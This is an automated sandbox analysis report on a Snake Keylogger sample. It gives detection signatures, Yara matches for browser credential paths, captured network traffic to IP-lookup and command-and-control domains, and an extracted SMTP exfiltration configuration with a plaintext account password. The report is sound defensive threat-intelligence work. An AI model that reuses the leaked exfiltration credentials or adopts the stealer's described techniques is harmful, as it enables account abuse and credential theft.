Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Zarefy4bOs.exe

Overview

General Information

Sample name:Zarefy4bOs.exe
renamed because original name is a hash value
Original sample name:e81ff60c955d9f232d4812a68ef4335f204be923d6aa75c5d309e8fe76eed1ed.exe
Analysis ID:1422062
MD5:eb9d9bc525bf2cfd5a566ff1939a65d8
SHA1:d1d9c33251db984f86a31033d94e365ff2787ad6
SHA256:e81ff60c955d9f232d4812a68ef4335f204be923d6aa75c5d309e8fe76eed1ed
Tags:exe
Infos:

Detection

Snake Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected Snake Keylogger
Machine Learning detection for sample
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Yara detected Generic Downloader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Outbound SMTP Connections
Tries to load missing DLLs
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • Zarefy4bOs.exe (PID: 3648 cmdline: "C:\Users\user\Desktop\Zarefy4bOs.exe" MD5: EB9D9BC525BF2CFD5A566FF1939A65D8)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "SMTP", "Username": "tslogs@mksiimst.com", "Password": "EbxKZL@2", "Host": "us2.smtp.mailhostbox.com ", "Port": "587"}
SourceRuleDescriptionAuthorStrings
Zarefy4bOs.exeJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    Zarefy4bOs.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
      Zarefy4bOs.exeJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
        Zarefy4bOs.exeWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
        • 0x14982:$a1: get_encryptedPassword
        • 0x14c78:$a2: get_encryptedUsername
        • 0x1478e:$a3: get_timePasswordChanged
        • 0x14889:$a4: get_passwordField
        • 0x14998:$a5: set_encryptedPassword
        • 0x15f9b:$a7: get_logins
        • 0x15efe:$a10: KeyLoggerEventArgs
        • 0x15b97:$a11: KeyLoggerEventArgsEventHandler
        Zarefy4bOs.exeMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
        • 0x1c29b:$a2: \Comodo\Dragon\User Data\Default\Login Data
        • 0x1b4cd:$a3: \Google\Chrome\User Data\Default\Login Data
        • 0x1b900:$a4: \Orbitum\User Data\Default\Login Data
        • 0x1c93f:$a5: \Kometa\User Data\Default\Login Data
        Click to see the 2 entries
        SourceRuleDescriptionAuthorStrings
        dump.pcapJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
          SourceRuleDescriptionAuthorStrings
          00000000.00000000.1993481887.0000000000422000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000000.00000000.1993481887.0000000000422000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
              00000000.00000000.1993481887.0000000000422000.00000002.00000001.01000000.00000003.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
              • 0x14782:$a1: get_encryptedPassword
              • 0x14a78:$a2: get_encryptedUsername
              • 0x1458e:$a3: get_timePasswordChanged
              • 0x14689:$a4: get_passwordField
              • 0x14798:$a5: set_encryptedPassword
              • 0x15d9b:$a7: get_logins
              • 0x15cfe:$a10: KeyLoggerEventArgs
              • 0x15997:$a11: KeyLoggerEventArgsEventHandler
              00000000.00000000.1993481887.0000000000422000.00000002.00000001.01000000.00000003.sdmpMALWARE_Win_SnakeKeyloggerDetects Snake KeyloggerditekSHen
              • 0x180c0:$x1: $%SMTPDV$
              • 0x18124:$x2: $#TheHashHere%&
              • 0x1975f:$x3: %FTPDV$
              • 0x19853:$x4: $%TelegramDv$
              • 0x15997:$x5: KeyLoggerEventArgs
              • 0x15cfe:$x5: KeyLoggerEventArgs
              • 0x19783:$m2: Clipboard Logs ID
              • 0x1994f:$m2: Screenshot Logs ID
              • 0x19a1b:$m2: keystroke Logs ID
              • 0x19927:$m4: \SnakeKeylogger\
              00000000.00000002.4461938228.0000000002B58000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
                Click to see the 5 entries
                SourceRuleDescriptionAuthorStrings
                0.0.Zarefy4bOs.exe.420000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                  0.0.Zarefy4bOs.exe.420000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                    0.0.Zarefy4bOs.exe.420000.0.unpackJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
                      0.0.Zarefy4bOs.exe.420000.0.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
                      • 0x14982:$a1: get_encryptedPassword
                      • 0x14c78:$a2: get_encryptedUsername
                      • 0x1478e:$a3: get_timePasswordChanged
                      • 0x14889:$a4: get_passwordField
                      • 0x14998:$a5: set_encryptedPassword
                      • 0x15f9b:$a7: get_logins
                      • 0x15efe:$a10: KeyLoggerEventArgs
                      • 0x15b97:$a11: KeyLoggerEventArgsEventHandler
                      0.0.Zarefy4bOs.exe.420000.0.unpackMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
                      • 0x1c29b:$a2: \Comodo\Dragon\User Data\Default\Login Data
                      • 0x1b4cd:$a3: \Google\Chrome\User Data\Default\Login Data
                      • 0x1b900:$a4: \Orbitum\User Data\Default\Login Data
                      • 0x1c93f:$a5: \Kometa\User Data\Default\Login Data
                      Click to see the 2 entries

                      System Summary

                      barindex
                      Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 208.91.199.225, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\Desktop\Zarefy4bOs.exe, Initiated: true, ProcessId: 3648, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49728
                      Timestamp:04/08/24-10:03:49.773592
                      SID:2044767
                      Source Port:49728
                      Destination Port:587
                      Protocol:TCP
                      Classtype:A Network Trojan was detected

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: Zarefy4bOs.exeAvira: detected
                      Source: https://scratchdreams.tkAvira URL Cloud: Label: malware
                      Source: https://scratchdreams.tk/_send_.php?TSAvira URL Cloud: Label: malware
                      Source: http://scratchdreams.tkAvira URL Cloud: Label: malware
                      Source: 00000000.00000002.4461938228.0000000002881000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "tslogs@mksiimst.com", "Password": "EbxKZL@2", "Host": "us2.smtp.mailhostbox.com ", "Port": "587"}
                      Source: scratchdreams.tkVirustotal: Detection: 6%Perma Link
                      Source: https://scratchdreams.tkVirustotal: Detection: 15%Perma Link
                      Source: http://scratchdreams.tkVirustotal: Detection: 6%Perma Link
                      Source: Zarefy4bOs.exeReversingLabs: Detection: 65%
                      Source: Zarefy4bOs.exeVirustotal: Detection: 67%Perma Link
                      Source: Zarefy4bOs.exeJoe Sandbox ML: detected
                      Source: Zarefy4bOs.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: unknownHTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.5:49706 version: TLS 1.0
                      Source: unknownHTTPS traffic detected: 104.21.27.85:443 -> 192.168.2.5:49720 version: TLS 1.2
                      Source: Zarefy4bOs.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeCode function: 4x nop then jmp 0266FCD1h0_2_0266FA10
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeCode function: 4x nop then jmp 0266EFDDh0_2_0266EDF0
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeCode function: 4x nop then jmp 0266F967h0_2_0266EDF0
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h0_2_0266E310
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeCode function: 4x nop then jmp 027615D8h0_2_027611C0
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeCode function: 4x nop then jmp 02761011h0_2_02760D60
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeCode function: 4x nop then jmp 0276DCC1h0_2_0276DA18
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeCode function: 4x nop then jmp 0276E571h0_2_0276E2C8
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeCode function: 4x nop then jmp 0276EE21h0_2_0276EB78
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeCode function: 4x nop then jmp 0276B5A9h0_2_0276B300
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeCode function: 4x nop then jmp 0276BE59h0_2_0276BBB0
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeCode function: 4x nop then jmp 027602F1h0_2_02760040
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeCode function: 4x nop then jmp 0276C2B1h0_2_0276C008
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeCode function: 4x nop then jmp 0276CB61h0_2_0276C8B8
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeCode function: 4x nop then jmp 0276FB29h0_2_0276F880
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeCode function: 4x nop then jmp 0276D411h0_2_0276D168
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeCode function: 4x nop then jmp 02760BB1h0_2_02760900
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeCode function: 4x nop then jmp 027615D8h0_2_027611B1
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeCode function: 4x nop then jmp 0276E119h0_2_0276DE70
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeCode function: 4x nop then jmp 0276BA01h0_2_0276B758
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeCode function: 4x nop then jmp 0276E9C9h0_2_0276E720
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeCode function: 4x nop then jmp 0276F279h0_2_0276EFD0
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeCode function: 4x nop then jmp 0276C709h0_2_0276C460
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeCode function: 4x nop then jmp 0276F6D1h0_2_0276F428
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeCode function: 4x nop then jmp 02760751h0_2_027604A0
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeCode function: 4x nop then jmp 0276CFB9h0_2_0276CD10
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeCode function: 4x nop then jmp 027615D8h0_2_02761506
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeCode function: 4x nop then jmp 0276D869h0_2_0276D5C0

                      Networking

                      barindex
                      Source: TrafficSnort IDS: 2044767 ET TROJAN Snake Keylogger Exfil via SMTP 192.168.2.5:49728 -> 208.91.199.225:587
                      Source: Yara matchFile source: Zarefy4bOs.exe, type: SAMPLE
                      Source: Yara matchFile source: 0.0.Zarefy4bOs.exe.420000.0.unpack, type: UNPACKEDPE
                      Source: global trafficTCP traffic: 192.168.2.5:49728 -> 208.91.199.225:587
                      Source: global trafficHTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.org
                      Source: global trafficHTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.org
                      Source: global trafficHTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.org
                      Source: global trafficHTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.org
                      Source: global trafficHTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /_send_.php?TS HTTP/1.1Host: scratchdreams.tkConnection: Keep-Alive
                      Source: Joe Sandbox ViewIP Address: 104.21.67.152 104.21.67.152
                      Source: Joe Sandbox ViewIP Address: 193.122.6.168 193.122.6.168
                      Source: Joe Sandbox ViewIP Address: 208.91.199.225 208.91.199.225
                      Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                      Source: unknownDNS query: name: checkip.dyndns.org
                      Source: unknownDNS query: name: checkip.dyndns.org
                      Source: global trafficTCP traffic: 192.168.2.5:49728 -> 208.91.199.225:587
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: unknownHTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.5:49706 version: TLS 1.0
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global trafficHTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.org
                      Source: global trafficHTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.org
                      Source: global trafficHTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.org
                      Source: global trafficHTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.org
                      Source: global trafficHTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /_send_.php?TS HTTP/1.1Host: scratchdreams.tkConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: unknownDNS traffic detected: queries for: checkip.dyndns.org
                      Source: Zarefy4bOs.exe, 00000000.00000002.4461938228.00000000029E4000.00000004.00000800.00020000.00000000.sdmp, Zarefy4bOs.exe, 00000000.00000002.4461938228.0000000002A3B000.00000004.00000800.00020000.00000000.sdmp, Zarefy4bOs.exe, 00000000.00000002.4461938228.0000000002A2C000.00000004.00000800.00020000.00000000.sdmp, Zarefy4bOs.exe, 00000000.00000002.4461938228.0000000002944000.00000004.00000800.00020000.00000000.sdmp, Zarefy4bOs.exe, 00000000.00000002.4461938228.00000000029F2000.00000004.00000800.00020000.00000000.sdmp, Zarefy4bOs.exe, 00000000.00000002.4461938228.00000000029FF000.00000004.00000800.00020000.00000000.sdmp, Zarefy4bOs.exe, 00000000.00000002.4461938228.00000000029D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
                      Source: Zarefy4bOs.exe, 00000000.00000002.4461938228.0000000002935000.00000004.00000800.00020000.00000000.sdmp, Zarefy4bOs.exe, 00000000.00000002.4461938228.0000000002987000.00000004.00000800.00020000.00000000.sdmp, Zarefy4bOs.exe, 00000000.00000002.4461938228.00000000029E4000.00000004.00000800.00020000.00000000.sdmp, Zarefy4bOs.exe, 00000000.00000002.4461938228.0000000002A3B000.00000004.00000800.00020000.00000000.sdmp, Zarefy4bOs.exe, 00000000.00000002.4461938228.0000000002A2C000.00000004.00000800.00020000.00000000.sdmp, Zarefy4bOs.exe, 00000000.00000002.4461938228.0000000002944000.00000004.00000800.00020000.00000000.sdmp, Zarefy4bOs.exe, 00000000.00000002.4461938228.00000000029F2000.00000004.00000800.00020000.00000000.sdmp, Zarefy4bOs.exe, 00000000.00000002.4461938228.00000000029FF000.00000004.00000800.00020000.00000000.sdmp, Zarefy4bOs.exe, 00000000.00000002.4461938228.0000000002A0D000.00000004.00000800.00020000.00000000.sdmp, Zarefy4bOs.exe, 00000000.00000002.4461938228.00000000029D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                      Source: Zarefy4bOs.exe, 00000000.00000002.4461938228.0000000002881000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                      Source: Zarefy4bOs.exeString found in binary or memory: http://checkip.dyndns.org/q
                      Source: Zarefy4bOs.exe, 00000000.00000002.4461938228.00000000029E4000.00000004.00000800.00020000.00000000.sdmp, Zarefy4bOs.exe, 00000000.00000002.4461938228.0000000002A3B000.00000004.00000800.00020000.00000000.sdmp, Zarefy4bOs.exe, 00000000.00000002.4461938228.0000000002A2C000.00000004.00000800.00020000.00000000.sdmp, Zarefy4bOs.exe, 00000000.00000002.4461938228.000000000295C000.00000004.00000800.00020000.00000000.sdmp, Zarefy4bOs.exe, 00000000.00000002.4461938228.00000000029F2000.00000004.00000800.00020000.00000000.sdmp, Zarefy4bOs.exe, 00000000.00000002.4461938228.00000000029FF000.00000004.00000800.00020000.00000000.sdmp, Zarefy4bOs.exe, 00000000.00000002.4461938228.00000000029D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
                      Source: Zarefy4bOs.exe, 00000000.00000002.4461938228.0000000002881000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: Zarefy4bOs.exe, 00000000.00000002.4461938228.0000000002A49000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://scratchdreams.tk
                      Source: Zarefy4bOs.exe, 00000000.00000002.4461938228.0000000002B58000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://us2.smtp.mailhostbox.com
                      Source: Zarefy4bOs.exe, 00000000.00000002.4461938228.0000000002987000.00000004.00000800.00020000.00000000.sdmp, Zarefy4bOs.exe, 00000000.00000002.4461938228.00000000029E4000.00000004.00000800.00020000.00000000.sdmp, Zarefy4bOs.exe, 00000000.00000002.4461938228.0000000002A3B000.00000004.00000800.00020000.00000000.sdmp, Zarefy4bOs.exe, 00000000.00000002.4461938228.0000000002A2C000.00000004.00000800.00020000.00000000.sdmp, Zarefy4bOs.exe, 00000000.00000002.4461938228.0000000002944000.00000004.00000800.00020000.00000000.sdmp, Zarefy4bOs.exe, 00000000.00000002.4461938228.00000000029F2000.00000004.00000800.00020000.00000000.sdmp, Zarefy4bOs.exe, 00000000.00000002.4461938228.00000000029FF000.00000004.00000800.00020000.00000000.sdmp, Zarefy4bOs.exe, 00000000.00000002.4461938228.00000000029D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                      Source: Zarefy4bOs.exeString found in binary or memory: https://reallyfreegeoip.org/xml/
                      Source: Zarefy4bOs.exe, 00000000.00000002.4461938228.00000000029D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/102.129.152.231
                      Source: Zarefy4bOs.exe, 00000000.00000002.4461938228.0000000002987000.00000004.00000800.00020000.00000000.sdmp, Zarefy4bOs.exe, 00000000.00000002.4461938228.00000000029E4000.00000004.00000800.00020000.00000000.sdmp, Zarefy4bOs.exe, 00000000.00000002.4461938228.0000000002A3B000.00000004.00000800.00020000.00000000.sdmp, Zarefy4bOs.exe, 00000000.00000002.4461938228.0000000002A2C000.00000004.00000800.00020000.00000000.sdmp, Zarefy4bOs.exe, 00000000.00000002.4461938228.00000000029F2000.00000004.00000800.00020000.00000000.sdmp, Zarefy4bOs.exe, 00000000.00000002.4461938228.00000000029FF000.00000004.00000800.00020000.00000000.sdmp, Zarefy4bOs.exe, 00000000.00000002.4461938228.00000000029D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/102.129.152.231$
                      Source: Zarefy4bOs.exeString found in binary or memory: https://scratchdreams.tk
                      Source: Zarefy4bOs.exe, 00000000.00000002.4461938228.0000000002A49000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://scratchdreams.tk/_send_.php?TS
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                      Source: unknownHTTPS traffic detected: 104.21.27.85:443 -> 192.168.2.5:49720 version: TLS 1.2

                      System Summary

                      barindex
                      Source: Zarefy4bOs.exe, type: SAMPLEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: Zarefy4bOs.exe, type: SAMPLEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                      Source: Zarefy4bOs.exe, type: SAMPLEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                      Source: Zarefy4bOs.exe, type: SAMPLEMatched rule: Detects Snake Keylogger Author: ditekSHen
                      Source: 0.0.Zarefy4bOs.exe.420000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 0.0.Zarefy4bOs.exe.420000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                      Source: 0.0.Zarefy4bOs.exe.420000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                      Source: 0.0.Zarefy4bOs.exe.420000.0.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                      Source: 00000000.00000000.1993481887.0000000000422000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 00000000.00000000.1993481887.0000000000422000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                      Source: Process Memory Space: Zarefy4bOs.exe PID: 3648, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: Process Memory Space: Zarefy4bOs.exe PID: 3648, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeProcess Stats: CPU usage > 49%
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeCode function: 0_2_0266B3880_2_0266B388
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeCode function: 0_2_026661680_2_02666168
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeCode function: 0_2_0266C1F00_2_0266C1F0
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeCode function: 0_2_026621A80_2_026621A8
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeCode function: 0_2_0266C7B20_2_0266C7B2
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeCode function: 0_2_026667900_2_02666790
                      Source: C:\Users\user\Desktop\Zarefy4bOs.exeCode function: 0_2_0266C4D00_2_0266C4D0
